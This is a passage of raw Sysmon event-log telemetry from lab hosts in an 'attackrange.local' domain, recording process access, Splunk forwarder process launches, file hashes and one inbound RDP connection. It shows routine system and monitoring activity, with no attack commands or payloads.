10341000x8000000000000000810110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.970{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.860{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA54C6F9EA440D46D3CF2971280C0926,SHA256=74836F95A8B9861BF7A604F1BF6181F0E5B9C13EFF36359552D14789F2DBAAD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.307{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse45.141.87.27-29158-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:24.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB961022CED7A8368059DE2E2904954E,SHA256=2A62E3FE6E80B577E0B0674D0EF961706C6DA7B6F3ECE945CB6D50A6DCC53121,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.485{0C1E0330-F800-60EB-D579-00000000D001}36083684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.283{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C000CD29485FE1A08BA82BE61D64EFD,SHA256=9A8FB8A104C5E820D7ADE20AFA12DFC347244F720CE73ED8079147ADB8FA22DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:25.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A042F9B9C3420E1B077854A8272947FB,SHA256=A879DD15AB94A0A035C515914A19CDBE3A6C463A5234469619A9DF5E90A379E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:25.548{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F801-60EB-D779-00000000D001}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 